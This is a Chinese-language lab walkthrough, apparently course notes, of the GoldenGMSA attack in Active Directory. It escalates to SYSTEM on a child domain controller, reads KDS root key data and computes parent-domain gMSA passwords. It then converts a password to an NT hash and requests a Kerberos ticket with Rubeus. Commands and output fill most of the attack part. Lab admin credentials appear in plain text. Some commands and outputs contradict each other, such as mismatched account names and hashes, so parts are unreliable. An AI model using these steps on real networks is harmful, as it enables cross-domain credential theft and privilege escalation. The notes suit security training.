林内攻击-GoldenGMSA

1. 实验环境

  • DC02(子域控制器)- 10.129.229.207(DHCP)/ 172.16.210.3(双网卡) dev.inlanefreight.ad
  • DC01(父域控制器)- 172.16.210.99 inlanefreight.ad
  • DC02 的账号密码:Administrator 和 HTB_@cademy_adm!
    Pasted image 20260307145558.png

2. 介绍

服务账户因为不经常更换密码,所以很容易受到Kerberoasting的攻击,使用gMSA可以进行密码的托管,将定期修改密码的任务交给Windows来完成。可以一定程度得缓解Kerberoasting攻击

gMSA 的密码由 Active Directory(AD)处理,并每 30 天自动轮换一次。新密码随机生成,包含 256 个字节,极难破解。该密码通过结合周期性变化的密钥和 gMSA 的某些未命名属性来确定。此密钥存储在 KDS 根密钥对象中。

gMSA托管的密码存储在其msDS-ManagedPassword属性中,必须要有PrincipalsAllowedToRetrieveManagedPassword属性的对象才能读取此密码。这个属性通常授予运行该服务的服务器

2.1. 如何创建gMSA账户

PS C:\Users\Administrator> New-ADServiceAccount -Name "apache-dev" -DNSHostName "inlanefreight.ad" -PrincipalsAllowedToRetrieveManagedPassword htb-student-1 -Enabled $True
  • -Name:要创建的gMSA名字
  • -PrincipalsAllowedToRetrieveManagedPassword:允许获取此gMSA密码的对象
    Pasted image 20260307193844.png

如果我们使用BloodHound进行枚举的时候,我们可能会发现某个对象有ReadGMSAPassword权限,说明此对象可以读取gMSA密码,可以使用一些常见的工具进行读取,比如gMSADumper.py或者nxc。 但请注意:这些攻击只能获取到当前域内的gMSA密码,无法跨林

3. 跨域的 GoldenGMSA 攻击(子域 -> 父域)

如果我们在父域中发现一个 gMSA 账户,并希望从子域跨越信任边界对其进行入侵,可以利用 GoldenGMSA tool 发起跨信任关系的攻击,从而获取父域中存在的 gMSA 的密码。

3.1. 前提条件

要使用 GoldenGMSA 工具执行 GoldenGMSA 攻击,攻击者需要访问林根(父域)中 KDS 根密钥的以下特定属性:

  • cn
  • msKds-SecretAgreementParam
  • msKds-RootKeyData
  • msKds-KDFParam
  • msKds-KDFAlgorithmID
  • msKds-CreateTime
  • msKds-UseStartTime
  • msKds-Version
  • msKds-DomainID
  • msKds-PrivateKeyLength
  • msKds-PublicKeyLength
  • msKds-SecretAgreementAlgorithmID

这些信息可以通过读取林根(父域)中 CN=Master Root Keys,CN=Group Key Distribution Service,CN=Services,CN=Configuration,DC=inlanefreight,DC=ad 路径下 msKds-ProvRootKey 对象的属性来获取
Pasted image 20260307194425.png

但想要访问根域并获取这些KDS根密钥的属性,必须拥有以下权限之一:

  • 林根域中 Enterprise Admins 组的成员身份
  • 林根域中的 Domain Admins 组成员身份
  • NT AUTHORITY\SYSTEM 身份访问域控制器
    对林根域KDS 密钥属性具有访问权限的主体

因为GPO也是属于配置命名上下文的一部分,所以也是可以被复制到林内的其他域控的。所以只要在子域取得了SYSTEM权限,那么就有权限查询子域控的本地副本,并获取执行GoldenGMSA攻击的所需条件

然后我们回到子域控制器,由于 DACL 的存在,即使作为 Administrator 用户,我们也无法在本地副本中读取相同的属性。
Pasted image 20260307195217.png

但是 DACL 中允许 NT AUTHORITY\SYSTEM 访问子域控制器的属性
Pasted image 20260307195236.png

3.2. GoldenGMSA Tool

https://github.com/Semperis/GoldenGMSA

GoldenGMSA为我们提供了两种攻击方式,离线和在线。都可以利用GoldenGMSA Tool来获取,但都需要先能获取到子域的SYSTEM权限

3.2.1. 在线攻击:

  • 查询父域 inlanefreight.ad 以获取 gMSA 账户的 SID
  • 使用获取的 gMSA SID,通过 querying 两个域计算 gMSA 账户的密码

3.2.2. 离线攻击:

  • 查询父域 inlanefreight.ad 以获取 gMSA 账户的 SID 和 msds-ManagedPasswordID 
  • 使用 SYSTEM 权限查询子域 dev.inlanefreight.ad 以获取 kdsinfo
  • 利用获取的属性,通过手动将 KDS key 和 gMSA info 输入 GoldenGMSA 工具,计算父域中 gMSA 账户的密码

3.3. 在线攻击

3.3.1. 获取SYSTEM

.\PsExec -s -i powershell

3.3.2. 枚举父域的gMSA

PS C:\Users\Administrator\Documents> .\GoldenGMSA.exe gmsainfo --domain inlanefreight.ad

sAMAccountName:         svc_devadm$
objectSid:                      S-1-5-21-2879935145-656083549-3766571964-1106
rootKeyGuid:            ba932c0c-5c34-ce6e-fcb8-d441d116a736
msds-ManagedPasswordID: AQAAAEtEU0sCAAAAagEAAAgAAAAPAAAADCyTujRcbs78uNRB0RanNgAAAAAiAAAAIgAAAEkATgBMAEEATgBFAEYAUgBFAEkARwBIAFQALgBBAEQAAABJAE4ATABBAE4ARQBGAFIARQBJAEcASABUAC4AQQBEAAAA
----------------------------------------------

sAMAccountName:         gmsa_adm$
objectSid:                      S-1-5-21-2879935145-656083549-3766571964-3103
rootKeyGuid:            ba932c0c-5c34-ce6e-fcb8-d441d116a736
msds-ManagedPasswordID: AQAAAEtEU0sCAAAAawEAAAEAAAAMAAAADCyTujRcbs78uNRB0RanNgAAAAAiAAAAIgAAAEkATgBMAEEATgBFAEYAUgBFAEkARwBIAFQALgBBAEQAAABJAE4ATABBAE4ARQBGAFIARQBJAEcASABUAC4AQQBEAAAA
----------------------------------------------

3.3.3. 获取gMSA密码

获取到SID后,我们使用下面的命令获取gMSA密码

PS C:\Users\Administrator\Documents> .\GoldenGMSA.exe compute --sid "S-1-5-21-2879935145-656083549-3766571964-1106" --forest dev.inlanefreight.ad --domain inlanefreight.ad

Base64 Encoded Password:        0FooMwK6aTemEHkXp6IzxqOx2+bFyFq2tsoGtSVinsCuc2diQuzx9ppetPQqwEzTW4XMKqivF+hTey8eDGYnJXmWGbV9rPrQZkpuLpwmm5EfT+O9uIMrtnVIo1mrirDj6+nUjzv6026KsyCaXTOuzQjhatwWxif/Fq/YyuvqibmWYZ/XwxN9wj+f44r8uggzXK+9EtMNlR5j3U3tgaxo8JXw5BsAitFgUOKBghHGXB1wJ3NJ2PQwyxnT1or6N7IyANwYT/RJnlBqXJaeDV7LJq5wPNtOIOWpFAm+kbmuEY2xsiLHWngzFVXf08iTMifGHR2lX0zVeWtN16yu9X6TJw==
  • --forest:子域
  • --domain:父域

3.4. 离线攻击

3.4.1. 枚举gMSA

首先枚举与目标gMSA关联的 SID 和 msds-ManagedPasswordID

PS C:\Users\Administrator\Documents> .\GoldenGMSA.exe gmsainfo --domain inlanefreight.ad

sAMAccountName:         svc_devadm$
objectSid:                      S-1-5-21-2879935145-656083549-3766571964-1106
rootKeyGuid:            ba932c0c-5c34-ce6e-fcb8-d441d116a736
msds-ManagedPasswordID: AQAAAEtEU0sCAAAAagEAAAgAAAAPAAAADCyTujRcbs78uNRB0RanNgAAAAAiAAAAIgAAAEkATgBMAEEATgBFAEYAUgBFAEkARwBIAFQALgBBAEQAAABJAE4ATABBAE4ARQBGAFIARQBJAEcASABUAC4AQQBEAAAA
----------------------------------------------

sAMAccountName:         gmsa_adm$
objectSid:                      S-1-5-21-2879935145-656083549-3766571964-3103
rootKeyGuid:            ba932c0c-5c34-ce6e-fcb8-d441d116a736
msds-ManagedPasswordID: AQAAAEtEU0sCAAAAawEAAAEAAAAMAAAADCyTujRcbs78uNRB0RanNgAAAAAiAAAAIgAAAEkATgBMAEEATgBFAEYAUgBFAEkARwBIAFQALgBBAEQAAABJAE4ATABBAE4ARQBGAFIARQBJAEcASABUAC4AQQBEAAAA
----------------------------------------------

3.4.2. 枚举kdsinfo

使用 kdsinfo 参数。获取与 gMSA 相关联的关键分发服务(KDS)密钥,用于计算gMSA密码。

PS C:\Users\Administrator\Documents> .\GoldenGMSA.exe kdsinfo --forest dev.inlanefreight.ad

Guid:           ba932c0c-5c34-ce6e-fcb8-d441d116a736
Base64 blob:    AQAAAAwsk7o0XG7O/LjUQdEWpzYAAAAAAQAAAAAAAAAkAAAAUwBQADgAMAAwAF8AMQAwADgAXwBDAFQAUgBfAEgATQBBAEMAHgAAAAAAAAABAAAADgAAAAAAAABTAEgAQQA1ADEAMgAAAAAAAAAEAAAARABIAAwCAAAMAgAAREhQTQABAACHqOYdtLZmPP+70ZxlGVmZjO72CGYN0PJdLO7UQ147AOAN+PHWGVfU+vffRWGyqjAWw9kRNAlvqjv0KW2DDpp8IJ4MZJdRer1aip0wa89n7ZH55nJbR1jAIuCx70J1v3tsW/wR1F+QiLlB9U6x5Zu4vDmgvxIwf1xP23DFgbI/drY6yuHKpreQLVJSZzVIig7xPG2aUb+kqzrYNHeWUk2O9qFntaQYJdln4UTlFAVkJRzKy4PmtIb2s8o/eXFQYCbAuFf2iZYoVt7UAQq9C+Yhw6OWClTnEMN18mN11wFBA6S1QzDBmK8SYRbSJ24RcV9pOHf61+8JytsJSukeGhWXP7Msm3MTTQsud1BmYO29SEynsY8h7yBUB/R5OhoLoSUQ28FQd75GP/9P7UqsC7VVvjpsGwxrR7G8N3O/foxvYpASKPjCjLsYpVrjE0EACmUBlvkxx3pX8t30Y+Xp7BRLd33mKqq4qGKKw3bSgtbtOGTmeYJCjryDHRQ0j28vkZO1BFrydnFk4d/JZ8H7Py5VpL0b/+g7nIDQUrmF0YLqCtsqO3MT0/4UyEhLHgUliLm30rvS3wFhmezQbhVXzQkVszU7u2Tg7Dd/0Cg3DfkrUseJFCjNxn62GEtSPR2yRsMvYweEkPAO+NZH0UjUeVRRXiMnz++YxYJmS0wPbMQWWQACAAAACAAAAAAAAAAAAAAAAAAAAQAAAAAAAAABAAAAAAAAAGgAAABDAE4APQBEAEMAMAAxACwATwBVAD0ARABvAG0AYQBpAG4AIABDAG8AbgB0AHIAbwBsAGwAZQByAHMALABEAEMAPQBJAE4ATABBAE4ARQBGAFIARQBJAEcASABUACwARABDAD0AQQBEADB1nboTh9kB6Iuz6L+G2QEAAAAAAAAAAEAAAAAAAAAAKDDqBWv0BE7GIm2X9sCjfDGzhSfRwXb6NzrI1IuP45cdQ/9JfY4Uot2JHFw3QEGXuFruFNjHAsitBmN+gs+Shw==
----------------------------------------------

3.4.3. 计算 gMSA 密码

指定目标gMSA 的 SID 、 kdskey 和 msds-ManagedPasswordID 手动计算 gMSA 密码

*Evil-WinRM* PS C:\Users\Administrator\Documents> .\GoldenGMSA.exe compute --sid "S-1-5-21-2879935145-656083549-3766571964-1106" --kdskey AQAAAAwsk7o0XG7O/LjUQdEWpzYAAAAAAQAAAAAAAAAkAAAAUwBQADgAMAAwAF8AMQAwADgAXwBDAFQAUgBfAEgATQBBAEMAHgAAAAAAAAABAAAADgAAAAAAAABTAEgAQQA1ADEAMgAAAAAAAAAEAAAARABIAAwCAAAMAgAAREhQTQABAACHqOYdtLZmPP+70ZxlGVmZjO72CGYN0PJdLO7UQ147AOAN+PHWGVfU+vffRWGyqjAWw9kRNAlvqjv0KW2DDpp8IJ4MZJdRer1aip0wa89n7ZH55nJbR1jAIuCx70J1v3tsW/wR1F+QiLlB9U6x5Zu4vDmgvxIwf1xP23DFgbI/drY6yuHKpreQLVJSZzVIig7xPG2aUb+kqzrYNHeWUk2O9qFntaQYJdln4UTlFAVkJRzKy4PmtIb2s8o/eXFQYCbAuFf2iZYoVt7UAQq9C+Yhw6OWClTnEMN18mN11wFBA6S1QzDBmK8SYRbSJ24RcV9pOHf61+8JytsJSukeGhWXP7Msm3MTTQsud1BmYO29SEynsY8h7yBUB/R5OhoLoSUQ28FQd75GP/9P7UqsC7VVvjpsGwxrR7G8N3O/foxvYpASKPjCjLsYpVrjE0EACmUBlvkxx3pX8t30Y+Xp7BRLd33mKqq4qGKKw3bSgtbtOGTmeYJCjryDHRQ0j28vkZO1BFrydnFk4d/JZ8H7Py5VpL0b/+g7nIDQUrmF0YLqCtsqO3MT0/4UyEhLHgUliLm30rvS3wFhmezQbhVXzQkVszU7u2Tg7Dd/0Cg3DfkrUseJFCjNxn62GEtSPR2yRsMvYweEkPAO+NZH0UjUeVRRXiMnz++YxYJmS0wPbMQWWQACAAAACAAAAAAAAAAAAAAAAAAAAQAAAAAAAAABAAAAAAAAAGgAAABDAE4APQBEAEMAMAAxACwATwBVAD0ARABvAG0AYQBpAG4AIABDAG8AbgB0AHIAbwBsAGwAZQByAHMALABEAEMAPQBJAE4ATABBAE4ARQBGAFIARQBJAEcASABUACwARABDAD0AQQBEADB1nboTh9kB6Iuz6L+G2QEAAAAAAAAAAEAAAAAAAAAAKDDqBWv0BE7GIm2X9sCjfDGzhSfRwXb6NzrI1IuP45cdQ/9JfY4Uot2JHFw3QEGXuFruFNjHAsitBmN+gs+Shw== --pwdid AQAAAEtEU0sCAAAAaQEAABEAAAAfAAAADCyTujRcbs78uNRB0RanNgAAAAAiAAAAIgAAAEkATgBMAEEATgBFAEYAUgBFAEkARwBIAFQALgBBAEQAAABJAE4ATABBAE4ARQBGAFIARQBJAEcASABUAC4AQQBEAAAA

Base64 Encoded Password:        tPUI4I55GejjKpdXuVs6qleQvZAfttXyO7kd8tStSEDQscsZdQAHQhw4RynTsBZSA9dMzq96tz8WDH94g5Eq/Y3a5MzX/Bb3JVCYzUCB37x6bj40ygOC5/nJ4EQjbi5RanLbN+hVhgZ9PIrYmUq7G46TXkifsMoGSGBWTw53XE6z8qsm9mMF7SzqY/v0NdWrteXNtrBkNuRjpzpYJwJjZWvnVZy3Np1fEkaTJLR9Gomiw4ddUKSJDWsXaGOu3EVBdM8SgmVTJANzEM4Bet6ldt8O6oNJLUV44UMIgyRmLwcPhvW/8n9ndH8rvAWwN5YYcDd+0bHTFT9c7tlumD/mvA==

3.5. 密码转为NT哈希

组托管服务账户密码默认经过加密,防止直接获取明文密码,并支持在 Active Directory 中进行自动化管理。这种加密确保了合规性,降低了未经授权访问的风险,并符合最小权限原则

┌──(root㉿kali)-[~/Desktop/htb/Academy/Trust]
└─# echo -n 'tPUI4I55GejjKpdXuVs6qleQvZAfttXyO7kd8tStSEDQscsZdQAHQhw4RynTsBZSA9dMzq96tz8WDH94g5Eq/Y3a5MzX/Bb3JVCYzUCB37x6bj40ygOC5/nJ4EQjbi5RanLbN+hVhgZ9PIrYmUq7G46TXkifsMoGSGBWTw53XE6z8qsm9mMF7SzqY/v0NdWrteXNtrBkNuRjpzpYJwJjZWvnVZy3Np1fEkaTJLR9Gomiw4ddUKSJDWsXaGOu3EVBdM8SgmVTJANzEM4Bet6ldt8O6oNJLUV44UMIgyRmLwcPhvW/8n9ndH8rvAWwN5YYcDd+0bHTFT9c7tlumD/mvA==' |base64 -d
y*W[:W;H@бuB8G)ӰRLίz?
khcEAteS$szޥvI-Ex$f/gt+7p7~ѱ?\n?

可以发现解码后是加密字符

┌──(root㉿kali)-[~/Desktop/htb/Academy/Trust]
└─# python3 -c "import hashlib, base64; base64_input = 'tPUI4I55GejjKpdXuVs6qleQvZAfttXyO7kd8tStSEDQscsZdQAHQhw4RynTsBZSA9dMzq96tz8WDH94g5Eq/Y3a5MzX/Bb3JVCYzUCB37x6bj40ygOC5/nJ4EQjbi5RanLbN+hVhgZ9PIrYmUq7G46TXkifsMoGSGBWTw53XE6z8qsm9mMF7SzqY/v0NdWrteXNtrBkNuRjpzpYJwJjZWvnVZy3Np1fEkaTJLR9Gomiw4ddUKSJDWsXaGOu3EVBdM8SgmVTJANzEM4Bet6ldt8O6oNJLUV44UMIgyRmLwcPhvW/8n9ndH8rvAWwN5YYcDd+0bHTFT9c7tlumD/mvA=='; print(hashlib.new('md4', base64.b64decode(base64_input)).hexdigest())"
e98bb5b622728ab7abcd38037aa17e56

MD4 哈希函数在 hashlib 库中的可用性取决于 Python 在特定平台上使用的 OpenSSL 库版本。在 OpenSSL 3 中,MD4 被标记为遗留算法,默认不可用。因此,在安装了 OpenSSL 3.x 的系统上运行此脚本会导致 unsupported hash type 错误。可以按照此处所示启用遗留支持来解决此问题。

也可以使用 Python 的 pycryptodome 库来计算 NT 哈希值

┌──(root㉿kali)-[~/Desktop/htb/Academy/Trust]
└─# python3 -c "from Crypto.Hash import MD4; import base64; base64_input = '0FooMwK6aTemEHkXp6IzxqOx2+bFyFq2tsoGtSVinsCuc2diQuzx9ppetPQqwEzTW4XMKqivF+hTey8eDGYnJXmWGbV9rPrQZkpuLpwmm5EfT+O9uIMrtnVIo1mrirDj6+nUjzv6026KsyCaXTOuzQjhatwWxif/Fq/YyuvqibmWYZ/XwxN9wj+f44r8uggzXK+9EtMNlR5j3U3tgaxo8JXw5BsAitFgUOKBghHGXB1wJ3NJ2PQwyxnT1or6N7IyANwYT/RJnlBqXJaeDV7LJq5wPNtOIOWpFAm+kbmuEY2xsiLHWngzFVXf08iTMifGHR2lX0zVeWtN16yu9X6TJw=='; print(MD4.new(base64.b64decode(base64_input)).hexdigest())"
9ddf2e33e3f3662223bdf1dcaf03feb3

3.5.1. 获取tgt

PS C:\Tools> .\Rubeus.exe asktgt /user:gmsa_adm$ /rc4:9ddf2e33e3f3662223bdf1dcaf03feb3 /domain:inlanefreight.ad /ptt
______        _
(_____ \      | |
_____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/
v2.2.3

[*] Action: Ask TGT
[*] Using rc4_hmac hash: 32ac66cd327aa76b3f1ca6eb82a801c5
[*] Building AS-REQ (w/ preauth) for: 'inlanefreight.ad\svc_devadm$'
[*] Using domain controller: 172.16.210.99:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIFuDCCBbSgAwIBBaEDAgEWooIEvjCCBLphggS2MIIEsqADAgEFoRIbEElOTEFORUZSRUlHSFQuQUSi
JTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEGlubGFuZWZyZWlnaHQuYWSjggRuMIIEaqADAgESoQMCAQKiggRc
BIIEWDev0eL5IFlaTJ6Sb3rmcogJF40bFuZdfK5sV9yDz7CdXhaxoM2gXfFgP6ZEBvgwwyXPIU57kmeC
7SKekpr0Dt4ffuO/hfHTHqPIEc4GRx7KWRKBMSr4/yeb3AGePPVv4+PCmbJTRL8wiAX0EAUrKpqqAQ9V
aJCk+xcY+7FZ5PCKMZyqFUgVYP+jXlcV/2crx3aXIo/o9sOxGh1lsXcTfHtcUXTK0MvfBbQc2/gcX41N
<SNIP>

[+] Ticket successfully imported!
ServiceName              :  krbtgt/inlanefreight.ad
ServiceRealm             :  INLANEFREIGHT.AD
UserName                 :  svc_devadm$
UserRealm                :  INLANEFREIGHT.AD
StartTime                :  3/14/2024 4:11:39 PM
EndTime                  :  3/15/2024 2:11:39 AM
RenewTill                :  3/21/2024 4:11:39 PM
Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType                  :  rc4_hmac
Base64(key)              :  sbpg5+PlJWhXObRc4kqmRA==
ASREP (key)              :  32AC66CD327AA76B3F1CA6EB82A801C5